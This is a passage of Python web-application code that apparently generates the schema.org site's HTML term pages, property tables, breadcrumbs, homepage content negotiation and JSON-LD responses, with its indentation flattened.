home = node.getHomeLayer()
if home in ENABLED_EXTENSIONS and home != getHostExt():
port = ""
if myport != "80":
port = ":%s" % myport
urlprefix = makeUrl(home)
extclass = ""
extflag = ""
tooltip = ""
if home != "core" and home != "":
extclass = "class=\"ext ext-%s\" " % home
extflag = EXTENSION_SUFFIX
tooltip = "title=\"Extended schema: %s.schema.org\" " % home
return "<a %s %s href=\"%s%s%s\"%s%s>%s</a>%s" % (tooltip, extclass, urlprefix, hashorslash, node.id, prop, title, label, extflag)
def makeLinksFromArray(self, nodearray, tooltip=''):
"""Make a comma separate list of links via ml() function.
* tooltip - optional text to use as title of all links
"""
hyperlinks = []
for f in nodearray:
hyperlinks.append(self.ml(f, f.id, tooltip))
return (", ".join(hyperlinks))
def emitUnitHeaders(self, node, layers='core'):
"""Write out the HTML page headers for this node."""
self.write("<h1 class=\"page-title\">\n")
self.write(node.id)
self.write("</h1>")
home = node.home
if home != "core" and home != "":
self.write("Defined in the %s.schema.org extension." % home)
self.write(" (This is an initial exploratory release.)<br/>")
self.emitCanonicalURL(node)
self.BreadCrumbs(node, layers=layers)
comment = GetComment(node, layers)
self.write(" <div property=\"rdfs:comment\">%s</div>\n\n" % (comment) + "\n")
self.write(" <br/><div>Usage: %s</div>\n\n" % (node.UsageStr()) + "\n")
self.write(self.moreInfoBlock(node))
if (node.isClass(layers=layers) and not node.isDataType(layers=layers) and node.id != "DataType"):
self.write("<table class=\"definition-table\">\n <thead>\n <tr><th>Property</th><th>Expected Type</th><th>Description</th> \n </tr>\n </thead>\n\n")
def emitCanonicalURL(self,node):
cURL = "http://schema.org/" + node.id
self.write(" <span class=\"canonicalUrl\">Canonical URL: <a href=\"%s\">%s</a></span>" % (cURL, cURL))
# Stacks to support multiple inheritance
crumbStacks = []
def BreadCrumbs(self, node, layers):
self.crumbStacks = []
cstack = []
self.crumbStacks.append(cstack)
self.WalkCrumbs(node,cstack,layers=layers)
if (node.isAttribute(layers=layers)):
cstack.append(Unit.GetUnit("Property"))
cstack.append(Unit.GetUnit("Thing"))
enuma = node.isEnumerationValue(layers=layers)
self.write("<h4>")
rowcount = 0
for row in range(len(self.crumbStacks)):
if(":" in self.crumbStacks[row][len(self.crumbStacks[row])-1].id):
continue
count = 0
if rowcount > 0:
self.write("<br/>")
self.write("<span class='breadcrumbs'>")
while(len(self.crumbStacks[row]) > 0):
n = self.crumbStacks[row].pop()
if(count > 0):
if((len(self.crumbStacks[row]) == 0) and enuma):
self.write(" :: ")
else:
self.write(" > ")
elif n.id == "Class": # If Class is first breadcrum suppress it
continue
count += 1
self.write("%s" % (self.ml(n)))
self.write("</span>\n")
rowcount += 1
self.write("</h4>\n")
#Walk up the stack, appending crumbs, and create new stacks (duplicating crumbs already identified) if more than one parent is found
def WalkCrumbs(self, node, cstack, layers):
if "http://" in node.id: #Suppress external class references
return
cstack.append(node)
tmpStacks = []
tmpStacks.append(cstack)
subs = []
if(node.isDataType(layers=layers)):
subs = GetTargets(Unit.GetUnit("typeOf"), node, layers=layers)
subs += GetTargets(Unit.GetUnit("rdfs:subClassOf"), node, layers=layers)
elif node.isClass(layers=layers):
subs = GetTargets(Unit.GetUnit("rdfs:subClassOf"), node, layers=layers)
elif(node.isAttribute(layers=layers)):
subs = GetTargets(Unit.GetUnit("rdfs:subPropertyOf"), node, layers=layers)
else:
subs = GetTargets(Unit.GetUnit("typeOf"), node, layers=layers)# Enumerations are classes that have no declared subclasses
for i in range(len(subs)):
if(i > 0):
t = cstack[:]
tmpStacks.append(t)
self.crumbStacks.append(t)
x = 0
for p in subs:
self.WalkCrumbs(p,tmpStacks[x],layers=layers)
x += 1
def emitSimplePropertiesPerType(self, cl, layers="core", out=None, hashorslash="/"):
"""Emits a simple list of properties applicable to the specified type."""
if not out:
out = self
out.write("<ul class='props4type'>")
for prop in sorted(GetSources( Unit.GetUnit("domainIncludes"), cl, layers=layers), key=lambda u: u.id):
if (prop.superseded(layers=layers)):
continue
out.write("<li><a href='%s%s'>%s</a></li>" % ( hashorslash, prop.id, prop.id ))
out.write("</ul>\n\n")
def emitSimplePropertiesIntoType(self, cl, layers="core", out=None, hashorslash="/"):
"""Emits a simple list of properties whose values are the specified type."""
if not out:
out = self
out.write("<ul class='props2type'>")
for prop in sorted(GetSources( Unit.GetUnit("rangeIncludes"), cl, layers=layers), key=lambda u: u.id):
if (prop.superseded(layers=layers)):
continue
out.write("<li><a href='%s%s'>%s</a></li>" % ( hashorslash, prop.id, prop.id ))
out.write("</ul>\n\n")
def ClassProperties (self, cl, subclass=False, layers="core", out=None, hashorslash="/"):
"""Write out a table of properties for a per-type page."""
if not out:
out = self
propcount = 0
headerPrinted = False
di = Unit.GetUnit("domainIncludes")
ri = Unit.GetUnit("rangeIncludes")
for prop in sorted(GetSources(di, cl, layers=layers), key=lambda u: u.id):
if (prop.superseded(layers=layers)):
continue
supersedes = prop.supersedes(layers=layers)
olderprops = prop.supersedes_all(layers=layers)
inverseprop = prop.inverseproperty(layers=layers)
subprops = prop.subproperties(layers=layers)
superprops = prop.superproperties(layers=layers)
ranges = GetTargets(ri, prop, layers=layers)
comment = GetComment(prop, layers=layers)
if (not headerPrinted):
class_head = self.ml(cl)
if subclass:
class_head = self.ml(cl, prop="rdfs:subClassOf")
out.write("<tr class=\"supertype\">\n <th class=\"supertype-name\" colspan=\"3\">Properties from %s</th>\n \n</tr>\n\n<tbody class=\"supertype\">\n " % (class_head))
headerPrinted = True
out.write("<tr typeof=\"rdfs:Property\" resource=\"http://schema.org/%s\">\n \n <th class=\"prop-nam\" scope=\"row\">\n\n<code property=\"rdfs:label\">%s</code>\n </th>\n " % (prop.id, self.ml(prop)))
out.write("<td class=\"prop-ect\">\n")
first_range = True
for r in ranges:
if (not first_range):
out.write(" or <br/> ")
first_range = False
out.write(self.ml(r, prop='rangeIncludes'))
out.write(" ")
out.write("</td>")
out.write("<td class=\"prop-desc\" property=\"rdfs:comment\">%s" % (comment))
if (len(olderprops) > 0):
olderlinks = ", ".join([self.ml(o) for o in olderprops])
out.write(" Supersedes %s." % olderlinks )
if (inverseprop != None):
out.write("<br/> Inverse property: %s." % (self.ml(inverseprop)))
out.write("</td></tr>")
subclass = False
propcount += 1
if subclass: # in case the superclass has no defined attributes
out.write("<tr><td colspan=\"3\"><meta property=\"rdfs:subClassOf\" content=\"%s\"></td></tr>" % (cl.id))
return propcount
def emitClassExtensionSuperclasses (self, cl, layers="core", out=None):
first = True
count = 0
if not out:
out = self
buff = StringIO.StringIO()
sc = Unit.GetUnit("rdfs:subClassOf")
for p in GetTargets(sc, cl, ALL_LAYERS):
if inLayer(layers,p):
continue
if p.id == "http://www.w3.org/2000/01/rdf-schema#Class": #Special case for "DataType"
p.id = "Class"
sep = ", "
if first:
sep = "<li>"
first = False
buff.write("%s%s" % (sep,self.ml(p)))
count += 1
if(count > 0):
buff.write("</li>\n")
content = buff.getvalue()
if(len(content) > 0):
if cl.id == "DataType":
self.write("<h4>Subclass of:<h4>")
else:
self.write("<h4>Available supertypes defined in extensions</h4>")
self.write("<ul>")
self.write(content)
self.write("</ul>")
buff.close()
def emitClassExtensionProperties (self, cl, layers="core", out=None):
if not out:
out = self
buff = StringIO.StringIO()
for p in self.parentStack:
self._ClassExtensionProperties(buff, p, layers=layers)
content = buff.getvalue()
if(len(content) > 0):
self.write("<h4>Available properties in extensions</h4>")
self.write("<ul>")
self.write(content)
self.write("</ul>")
buff.close()
def _ClassExtensionProperties (self, out, cl, layers="core"):
"""Write out a list of properties not displayed as they are in extensions for a per-type page."""
di = Unit.GetUnit("domainIncludes")
first = True
count = 0
for prop in sorted(GetSources(di, cl, ALL_LAYERS), key=lambda u: u.id):
if (prop.superseded(layers=layers)):
continue
if inLayer(layers,prop):
continue
log.debug("ClassExtensionfFound %s " % (prop))
sep = ", "
if first:
out.write("<li>From %s: " % cl)
sep = ""
first = False
out.write("%s%s" % (sep,self.ml(prop)))
count += 1
if(count > 0):
out.write("</li>\n")
def emitClassIncomingProperties (self, cl, layers="core", out=None, hashorslash="/"):
"""Write out a table of incoming properties for a per-type page."""
if not out:
out = self
headerPrinted = False
di = Unit.GetUnit("domainIncludes")
ri = Unit.GetUnit("rangeIncludes")
for prop in sorted(GetSources(ri, cl, layers=layers), key=lambda u: u.id):
if (prop.superseded(layers=layers)):
continue
supersedes = prop.supersedes(layers=layers)
inverseprop = prop.inverseproperty(layers=layers)
subprops = prop.subproperties(layers=layers)
superprops = prop.superproperties(layers=layers)
ranges = GetTargets(di, prop, layers=layers)
comment = GetComment(prop, layers=layers)
if (not headerPrinted):
self.write("<br/><br/>Instances of %s may appear as values for the following properties<br/>" % (self.ml(cl)))
self.write("<table class=\"definition-table\">\n \n \n<thead>\n <tr><th>Property</th><th>On Types</th><th>Description</th> \n </tr>\n</thead>\n\n")
headerPrinted = True
self.write("<tr>\n<th class=\"prop-nam\" scope=\"row\">\n <code>%s</code>\n</th>\n " % (self.ml(prop)) + "\n")
self.write("<td class=\"prop-ect\">\n")
first_range = True
for r in ranges:
if (not first_range):
self.write(" or<br/> ")
first_range = False
self.write(self.ml(r))
self.write(" ")
self.write("</td>")
self.write("<td class=\"prop-desc\">%s " % (comment))
if (supersedes != None):
self.write(" Supersedes %s." % (self.ml(supersedes)))
if (inverseprop != None):
self.write("<br/> inverse property: %s." % (self.ml(inverseprop)) )
self.write("</td></tr>")
if (headerPrinted):
self.write("</table>\n")
def emitRangeTypesForProperty(self, node, layers="core", out=None, hashorslash="/"):
"""Write out simple HTML summary of this property's expected types."""
if not out:
out = self
out.write("<ul class='attrrangesummary'>")
for rt in sorted(GetTargets(Unit.GetUnit("rangeIncludes"), node, layers=layers), key=lambda u: u.id):
out.write("<li><a href='%s%s'>%s</a></li>" % ( hashorslash, rt.id, rt.id ))
out.write("</ul>\n\n")
def emitDomainTypesForProperty(self, node, layers="core", out=None, hashorslash="/"):
"""Write out simple HTML summary of types that expect this property."""
if not out:
out = self
out.write("<ul class='attrdomainsummary'>")
for dt in sorted(GetTargets(Unit.GetUnit("domainIncludes"), node, layers=layers), key=lambda u: u.id):
out.write("<li><a href='%s%s'>%s</a></li>" % ( hashorslash, dt.id, dt.id ))
out.write("</ul>\n\n")
def emitAttributeProperties(self, node, layers="core", out=None, hashorslash="/"):
"""Write out properties of this property, for a per-property page."""
if not out:
out = self
di = Unit.GetUnit("domainIncludes")
ri = Unit.GetUnit("rangeIncludes")
ranges = sorted(GetTargets(ri, node, layers=layers), key=lambda u: u.id)
domains = sorted(GetTargets(di, node, layers=layers), key=lambda u: u.id)
first_range = True
newerprop = node.supersededBy(layers=layers) # None or one. e.g. we're on 'seller'(new) page, we get 'vendor'(old)
olderprop = node.supersedes(layers=layers) # None or one
olderprops = node.supersedes_all(layers=layers) # list, e.g. 'seller' has 'vendor', 'merchant'.
inverseprop = node.inverseproperty(layers=layers)
subprops = node.subproperties(layers=layers)
superprops = node.superproperties(layers=layers)
if (inverseprop != None):
tt = "This means the same thing, but with the relationship direction reversed."
out.write("<p>Inverse-property: %s.</p>" % (self.ml(inverseprop, inverseprop.id,tt, prop=False, hashorslash=hashorslash)) )
out.write("<table class=\"definition-table\">\n")
out.write("<thead>\n <tr>\n <th>Values expected to be one of these types</th>\n </tr>\n</thead>\n\n <tr>\n <td>\n ")
for r in ranges:
if (not first_range):
out.write("<br/>")
first_range = False
tt = "The '%s' property has values that include instances of the '%s' type." % (node.id, r.id)
out.write(" <code>%s</code> " % (self.ml(r, r.id, tt, prop="rangeIncludes", hashorslash=hashorslash) +"\n"))
out.write(" </td>\n </tr>\n</table>\n\n")
first_domain = True
out.write("<table class=\"definition-table\">\n")
out.write(" <thead>\n <tr>\n <th>Used on these types</th>\n </tr>\n</thead>\n<tr>\n <td>")
for d in domains:
if (not first_domain):
out.write("<br/>")
first_domain = False
tt = "The '%s' property is used on the '%s' type." % (node.id, d.id)
out.write("\n <code>%s</code> " % (self.ml(d, d.id, tt, prop="domainIncludes",hashorslash=hashorslash)+"\n" ))
out.write(" </td>\n </tr>\n</table>\n\n")
if (subprops != None and len(subprops) > 0):
out.write("<table class=\"definition-table\">\n")
out.write(" <thead>\n <tr>\n <th>Sub-properties</th>\n </tr>\n</thead>\n")
for sbp in subprops:
c = GetComment(sbp,layers=layers)
tt = "%s: ''%s''" % ( sbp.id, c)
out.write("\n <tr><td><code>%s</code></td></tr>\n" % (self.ml(sbp, sbp.id, tt, hashorslash=hashorslash)))
out.write("\n</table>\n\n")
# Super-properties
if (superprops != None and len(superprops) > 0):
out.write("<table class=\"definition-table\">\n")
out.write(" <thead>\n <tr>\n <th>Super-properties</th>\n </tr>\n</thead>\n")
for spp in superprops:
c = GetComment(spp, layers=layers) # markup needs to be stripped from c, e.g. see 'logo', 'photo'
c = re.sub(r'<[^>]*>', '', c) # This is not a sanitizer, we trust our input.
tt = "%s: ''%s''" % ( spp.id, c)
out.write("\n <tr><td><code>%s</code></td></tr>\n" % (self.ml(spp, spp.id, tt,hashorslash)))
out.write("\n</table>\n\n")
# Supersedes
if (olderprops != None and len(olderprops) > 0):
out.write("<table class=\"definition-table\">\n")
out.write(" <thead>\n <tr>\n <th>Supersedes</th>\n </tr>\n</thead>\n")
for o in olderprops:
c = GetComment(o, layers=layers)
tt = "%s: ''%s''" % ( o.id, c)
out.write("\n <tr><td><code>%s</code></td></tr>\n" % (self.ml(o, o.id, tt, hashorslash)))
out.write("\n</table>\n\n")
# supersededBy (at most one direct successor)
if (newerprop != None):
out.write("<table class=\"definition-table\">\n")
out.write(" <thead>\n <tr>\n <th><a href=\"/supersededBy\">supersededBy</a></th>\n </tr>\n</thead>\n")
tt="supersededBy: %s" % newerprop.id
out.write("\n <tr><td><code>%s</code></td></tr>\n" % (self.ml(newerprop, newerprop.id, tt,hashorslash)))
out.write("\n</table>\n\n")
def rep(self, markup):
"""Replace < and > with HTML escape chars."""
m1 = re.sub("<", "&lt;", markup)
m2 = re.sub(">", "&gt;", m1)
# TODO: Ampersand? Check usage with examples.
return m2
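# Example (added for clarity, not in the original): rep("<b>1 < 2</b>") returns
# "&lt;b&gt;1 &lt; 2&lt;/b&gt;", so raw example markup can be displayed inside the
# <pre> blocks below without being interpreted by the browser.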
def handleHomepage(self, node):
"""Send the homepage, or if no HTML accept header received and JSON-LD was requested, send JSON-LD context file.
typical browser accept list: ('Accept', 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8')
# e.g. curl -H "Accept: application/ld+json" http://localhost:8080/
see also http://www.w3.org/Protocols/rfc2616/rfc2616-sec14.html
https://github.com/rvguha/schemaorg/issues/5
https://github.com/rvguha/schemaorg/wiki/JsonLd
"""
accept_header = self.request.headers.get('Accept').split(',')
logging.info("accepts: %s" % self.request.headers.get('Accept'))
if ENABLE_JSONLD_CONTEXT:
jsonldcontext = GetJsonLdContext(layers=ALL_LAYERS)
# Homepage is content-negotiated. HTML or JSON-LD.
mimereq = {}
for ah in accept_header:
ah = re.sub( r";q=\d?\.\d+", '', ah).rstrip()
mimereq[ah] = 1
html_score = mimereq.get('text/html', 5)
xhtml_score = mimereq.get('application/xhtml+xml', 5)
jsonld_score = mimereq.get('application/ld+json', 10)
# print "accept_header: " + str(accept_header) + " mimereq: "+str(mimereq) + "Scores H:{0} XH:{1} J:{2} ".format(html_score,xhtml_score,jsonld_score)
if (ENABLE_JSONLD_CONTEXT and (jsonld_score < html_score and jsonld_score < xhtml_score)):
self.response.headers['Content-Type'] = "application/ld+json"
self.emitCacheHeaders()
self.response.out.write( jsonldcontext )
return True
else:
# Serve a homepage from template
# the .tpl has responsibility for extension homepages
# TODO: pass in extension, base_domain etc.
sitekeyedhomepage = "homepage %s" % sitename
hp = DataCache.get(sitekeyedhomepage)
if hp != None:
self.response.out.write( hp )
#log.info("Served datacache homepage.tpl key: %s" % sitekeyedhomepage)
log.debug("Served datacache homepage.tpl key: %s" % sitekeyedhomepage)
else:
template = JINJA_ENVIRONMENT.get_template('homepage.tpl')
template_values = {
'ENABLE_HOSTED_EXTENSIONS': ENABLE_HOSTED_EXTENSIONS,
'SCHEMA_VERSION': SCHEMA_VERSION,
'sitename': sitename,
'myhost': myhost,
'myport': myport,
'mybasehost': mybasehost,
'host_ext': getHostExt(),
'home_page': "True",
'debugging': debugging
}
# We don't want JINJA2 doing any caching of included sub-templates.
page = template.render(template_values)
self.response.out.write( page )
log.debug("Served and cached fresh homepage.tpl key: %s " % sitekeyedhomepage)
#log.info("Served and cached fresh homepage.tpl key: %s " % sitekeyedhomepage)
DataCache.put(sitekeyedhomepage, page)
# self.response.out.write( open("static/index.html", 'r').read() )
return True
log.info("Warning: got here how?")
return False
def getExtendedSiteName(self, layers):
"""Returns site name (domain name), informed by the list of active layers."""
if layers==["core"]:
return "schema.org"
if len(layers)==0:
return "schema.org"
return (getHostExt() + ".schema.org")
def emitSchemaorgHeaders(self, entry='', is_class=False, ext_mappings='', sitemode="default", sitename="schema.org"):
"""
Generates, caches and emits HTML headers for class, property and enumeration pages. Leaves <body> open.
* entry = name of the class or property
"""
rdfs_type = 'rdfs:Property'
if is_class:
rdfs_type = 'rdfs:Class'
generated_page_id = "genericTermPageHeader-%s-%s" % ( str(entry), sitename )
gtp = DataCache.get( generated_page_id )
if gtp != None:
self.response.out.write( gtp )
log.debug("Served recycled genericTermPageHeader.tpl for %s" % generated_page_id )
else:
template = JINJA_ENVIRONMENT.get_template('genericTermPageHeader.tpl')
template_values = {
'entry': str(entry),
'sitemode': sitemode,
'sitename': sitename,
'menu_sel': "Schemas",
'rdfs_type': rdfs_type,
'ext_mappings': ext_mappings
}
out = template.render(template_values)
DataCache.put(generated_page_id,out)
log.debug("Served and cached fresh genericTermPageHeader.tpl for %s" % generated_page_id )
self.response.write(out)
def emitExactTermPage(self, node, layers="core"):
"""Emit a Web page that exactly matches this node."""
log.debug("EXACT PAGE: %s" % node.id)
self.outputStrings = [] # blank slate
ext_mappings = GetExtMappingsRDFa(node, layers=layers)
global sitemode, sitename
if ("schema.org" not in self.request.host and sitemode == "mainsite"):
sitemode = "mainsite testsite"
self.emitSchemaorgHeaders(node.id, node.isClass(), ext_mappings, sitemode, sitename)
if ( ENABLE_HOSTED_EXTENSIONS and ("core" not in layers or len(layers)>1) ):
ll = " ".join(layers).replace("core","")
target=""
if inLayer("core", node):
target = node.id
s = "<p id='lli' class='layerinfo %s'><a href=\"https://github.com/schemaorg/schemaorg/wiki/ExtensionList\">extension shown</a>: %s [<a href='%s'>x</a>]</p>\n" % (ll, ll, makeUrl("",target))
self.write(s)
cached = self.GetCachedText(node, layers)
if (cached != None):
self.response.write(cached)
return
self.parentStack = []
self.GetParentStack(node, layers=layers)
self.emitUnitHeaders(node, layers=layers) # writes <h1><table>...
if (node.isClass(layers=layers)):
subclass = True
for p in self.parentStack:
self.ClassProperties(p, p==self.parentStack[0], layers=layers)
if (not node.isDataType(layers=layers) and node.id != "DataType"):
self.write("\n\n</table>\n\n")
self.emitClassIncomingProperties(node, layers=layers)
self.emitClassExtensionSuperclasses(node,layers)
self.emitClassExtensionProperties(p,layers)
elif (Unit.isAttribute(node, layers=layers)):
self.emitAttributeProperties(node, layers=layers)
if (node.isClass(layers=layers)):
children = []
children = GetSources(Unit.GetUnit("rdfs:subClassOf"), node, ALL_LAYERS)# Normal subclasses
if(node.isDataType() or node.id == "DataType"):
children += GetSources(Unit.GetUnit("typeOf"), node, ALL_LAYERS)# Datatypes
children = sorted(children, key=lambda u: u.id)
if (len(children) > 0):
buff = StringIO.StringIO()
extbuff = StringIO.StringIO()
firstext=True
for c in children:
if inLayer(layers, c):
buff.write("<li> %s </li>" % (self.ml(c)))
else:
sep = ", "
if firstext:
sep = ""
firstext=False
extbuff.write("%s%s" % (sep,self.ml(c)) )
if (len(buff.getvalue()) > 0):
if node.isDataType():
self.write("<br/><b>More specific DataTypes</b><ul>")
else:
self.write("<br/><b>More specific Types</b><ul>")
self.write(buff.getvalue())
self.write("</ul>")
if (len(extbuff.getvalue()) > 0):
self.write("<h4>More specific Types available in extensions</h4><ul><li>")
self.write(extbuff.getvalue())
self.write("</li></ul>")
buff.close()
extbuff.close()
if (node.isEnumeration(layers=layers)):
children = sorted(GetSources(Unit.GetUnit("typeOf"), node, ALL_LAYERS), key=lambda u: u.id)
if (len(children) > 0):
buff = StringIO.StringIO()
extbuff = StringIO.StringIO()
firstext=True
for c in children:
if inLayer(layers, c):
buff.write("<li> %s </li>" % (self.ml(c)))
else:
sep = ","
if firstext:
sep = ""
firstext=False
extbuff.write("%s%s" % (sep,self.ml(c)) )
if (len(buff.getvalue()) > 0):
self.write("<br/><br/><b>Enumeration members</b><ul>")
self.write(buff.getvalue())
self.write("</ul>")
if (len(extbuff.getvalue()) > 0):
self.write("<h4>Enumeration members available in extensions</h4><ul><li>")
self.write(extbuff.getvalue())
self.write("</li></ul>")
buff.close()
extbuff.close()
ackorgs = GetTargets(Unit.GetUnit("dc:source"), node, layers=layers)
if (len(ackorgs) > 0):
self.write("<h4 id=\"acks\">Acknowledgements</h4>\n")
for ao in ackorgs:
acks = sorted(GetTargets(Unit.GetUnit("rdfs:comment"), ao, layers))
for ack in acks:
self.write(str(ack+"<br/>"))
examples = GetExamples(node, layers=layers)
log.debug("Rendering n=%s examples" % len(examples))
if (len(examples) > 0):
example_labels = [
('Without Markup', 'original_html', 'selected'),
('Microdata', 'microdata', ''),
('RDFa', 'rdfa', ''),
('JSON-LD', 'jsonld', ''),
]
self.write("<br/><br/><b><a id=\"examples\">Examples</a></b><br/><br/>\n\n")
for ex in examples:
if "id" in ex.egmeta:
self.write('<span id="%s"></span>' % ex.egmeta["id"])
self.write("<div class='ds-selector-tabs ds-selector'>\n")
self.write(" <div class='selectors'>\n")
for label, example_type, selected in example_labels:
self.write(" <a data-selects='%s' class='%s'>%s</a>\n"
% (example_type, selected, label))
self.write("</div>\n\n")
for label, example_type, selected in example_labels:
self.write("<pre class=\"prettyprint lang-html linenums %s %s\">%s</pre>\n\n"
% (example_type, selected, self.rep(ex.get(example_type))))
self.write("</div>\n\n")
self.write("<p class=\"version\"><b>Schema Version %s</b></p>\n\n" % SCHEMA_VERSION)
# TODO: add some version info regarding the extension
# Analytics
self.write("""<script>(function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){
(i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o),
m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m)
})(window,document,'script','//www.google-analytics.com/analytics.js','ga');
ga('create', 'UA-52672119-1', 'auto');ga('send', 'pageview');</script>""")
self.write(" \n\n</div>\n</body>\n</html>")
self.response.write(self.AddCachedText(node, self.outputStrings, layers))
def emitHTTPHeaders(self, node):
if ENABLE_CORS:
self.response.headers.add_header("Access-Control-Allow-Origin", "*") # entire site is public.
# see http://en.wikipedia.org/wiki/Cross-origin_resource_sharing
def handleHTTPRedirection(self, node):
return False # none yet.
# https://github.com/schemaorg/schemaorg/issues/4
def setupExtensionLayerlist(self, node):
# Identify which extension layer(s) are requested
# TODO: add subdomain support e.g. bib.schema.org/Globe
# instead of Globe?ext=bib which is more for debugging.
# 1. get a comma list from ?ext=foo,bar URL notation
extlist = cleanPath( self.request.get("ext") )# for debugging
extlist = re.sub(ext_re, '', extlist).split(',')
log.debug("?ext= extension list: %s " % ", ".join(extlist))
# 2. Ignore ?ext=, start with 'core' only.
layerlist = [ "core"]
# 3. Use host_ext if set, e.g. 'bib' from bib.schema.org
if getHostExt() != None:
log.debug("Host: %s host_ext: %s" % ( self.request.host , getHostExt() ) )
extlist.append(getHostExt())
# Report domain-requested extensions
for x in extlist:
log.debug("Ext filter found: %s" % str(x))
if x in ["core", "localhost", ""]:
continue
layerlist.append("%s" % str(x))
layerlist = list(set(layerlist)) # dedup
log.debug("layerlist: %s" % layerlist)
return layerlist
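# Illustrative example (an assumption, not from the original source): a request to
# http://bib.schema.org/Book?ext=auto yields extlist ['auto', 'bib'] once the host
# extension is appended; assuming both are in ENABLED_EXTENSIONS the deduplicated
# layerlist is e.g. ['core', 'auto', 'bib'] (ordering is not guaranteed because of set()).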
def handleJSONContext(self, node):
"""Handle JSON-LD Context non-homepage requests (including refuse if not enabled)."""
if not ENABLE_JSONLD_CONTEXT:
self.error(404)
self.response.out.write('<title>404 Not Found.</title><a href="/">404 Not Found (JSON-LD Context not enabled.)</a><br/><br/>')
return True
if (node=="docs/jsonldcontext.json.txt"):
jsonldcontext = GetJsonLdContext(layers=ALL_LAYERS)
self.response.headers['Content-Type'] = "text/plain"
self.emitCacheHeaders()
self.response.out.write( jsonldcontext )
return True
if (node=="docs/jsonldcontext.json"):
jsonldcontext = GetJsonLdContext(layers=ALL_LAYERS)
self.response.headers['Content-Type'] = "application/ld+json"
self.emitCacheHeaders()
self.response.out.write( jsonldcontext )
return True
return False
# see also handleHomepage for conneg'd version.
def handleFullHierarchyPage(self, node, layerlist='core'):
self.response.headers['Content-Type'] = "text/html"
self.emitCacheHeaders()
if DataCache.get('FullTreePage'):
self.response.out.write( DataCache.get('FullTreePage') )
log.debug("Serving recycled FullTreePage.")
return True
else:
template = JINJA_ENVIRONMENT.get_template('full.tpl')
extlist=""
count=0
for i in layerlist:
if i != "core":
sep = ""
if count > 0:
sep = ", "
extlist += "plus '%s'%s" % (i, sep)
count += 1
local_button = ""
local_label = "<h3>Core %s extension vocabularies</h3>" % extlist
if count == 0:
local_button = "Core vocabulary"
elif count == 1:
local_button = "Core %s extension" % extlist
else:
local_button = "Core %s extensions" % extlist
uThing = Unit.GetUnit("Thing")
uDataType = Unit.GetUnit("DataType")
mainroot = TypeHierarchyTree(local_label)
mainroot.traverseForHTML(uThing, layers=layerlist)
thing_tree = mainroot.toHTML()
fullmainroot = TypeHierarchyTree("<h3>Core plus all extension vocabularies</h3>")
fullmainroot.traverseForHTML(uThing, layers=ALL_LAYERS)
full_thing_tree = fullmainroot.toHTML()
dtroot = TypeHierarchyTree("<h4>Data Types</h4>")
dtroot.traverseForHTML(uDataType, layers=layerlist)
datatype_tree = dtroot.toHTML()
full_button = "Core plus all extensions"
page = template.render({ 'thing_tree': thing_tree,
'full_thing_tree': full_thing_tree,
'datatype_tree': datatype_tree,
'local_button': local_button,
'full_button': full_button,
'sitename': sitename,
'menu_sel': "Schemas"})
self.response.out.write( page )
log.debug("Serving fresh FullTreePage.")
DataCache.put("FullTreePage",page)
return True
def handleJSONSchemaTree(self, node, layerlist='core'):
"""Handle a request for a JSON-LD tree representation of the schemas (RDFS-based)."""
self.response.headers['Content-Type'] = "application/ld+json"
self.emitCacheHeaders()
if DataCache.get('JSONLDThingTree'):
self.response.out.write( DataCache.get('JSONLDThingTree') )
log.debug("Serving recycled JSONLDThingTree.")
return True
else:
uThing = Unit.GetUnit("Thing")
mainroot = TypeHierarchyTree()
mainroot.traverseForJSONLD(Unit.GetUnit("Thing"), layers=layerlist)
thing_tree = mainroot.toJSON()
self.response.out.write( thing_tree )
log.debug("Serving fresh JSONLDThingTree.")
DataCache.put("JSONLDThingTree",thing_tree)
return True
return False
def handleExactTermPage(self, node, layers='core'):
"""Handle with requests for specific terms like /Person, /fooBar. """
#self.outputStrings = [] # blank slate
schema_node = Unit.GetUnit(node) # e.g. "Person", "CreativeWork".
log.debug("Layers: %s",layers)
if inLayer(layers, schema_node):
self.emitExactTermPage(schema_node, layers=layers)
return True
else:
# log.info("Looking for node: %s in layers: %s" % (node.id, ",".join(all_layers.keys() )) )
if not ENABLE_HOSTED_EXTENSIONS:
return False
if schema_node is not None and schema_node.id in all_terms:# look for it in other layers
log.debug("TODO: layer toc: %s" % all_terms[schema_node.id] )
# self.response.out.write("Layers should be listed here. %s " % all_terms[node.id] )
extensions = []
for x in all_terms[schema_node.id]:
x = x.replace("#","")
ext = {}
ext['href'] = makeUrl(x,schema_node.id)
ext['text'] = x
extensions.append(ext)
#self.response.out.write("<li><a href='%s'>%s</a></li>" % (makeUrl(x,schema_node.id), x) )
template = JINJA_ENVIRONMENT.get_template('wrongExt.tpl')
page = template.render({ 'target': schema_node.id,
'extensions': extensions,
'sitename': "schema.org"})
self.response.out.write( page )
log.debug("Serving fresh wrongExtPage.")
return True
return False
def handle404Failure(self, node, layers="core"):
self.error(404)
self.emitSchemaorgHeaders("404 Missing")
self.response.out.write('<h3>404 Not Found.</h3><p><br/>Page not found. Please <a href="/">try the homepage.</a><br/><br/></p>')
clean_node = cleanPath(node)
log.debug("404: clean_node: clean_node: %s node: %s" % (clean_node, node))
base_term = Unit.GetUnit( node.rsplit('/')[0] )
if base_term != None :
self.response.out.write('<div>Perhaps you meant: <a href="/%s">%s</a></div> <br/><br/> ' % ( base_term.id, base_term.id ))
base_actionprop = Unit.GetUnit( node.rsplit('-')[0] )
if base_actionprop != None :
self.response.out.write('<div>Looking for an <a href="/Action">Action</a>-related property? Note that xyz-input and xyz-output have <a href="/docs/actions.html">special meaning</a>. See also: <a href="/%s">%s</a></div> <br/><br/> ' % ( base_actionprop.id, base_actionprop.id ))
return True
# if (node == "version/2.0/" or node == "version/latest/" or "version/" in node) ...
def handleFullReleasePage(self, node, layerlist='core'):
"""Deal with a request for a full release summary page. Lists all terms and their descriptions inline in one long page.
version/latest/ is from current schemas, others will need to be loaded and emitted from stored HTML snapshots (for now)."""
# http://jinja.pocoo.org/docs/dev/templates/
global releaselog
clean_node = cleanPath(node)
self.response.headers['Content-Type'] = "text/html"
self.emitCacheHeaders()
requested_version = clean_node.rsplit('/')[1]
requested_format = clean_node.rsplit('/')[-1]
if len( clean_node.rsplit('/') ) == 2:
requested_format=""
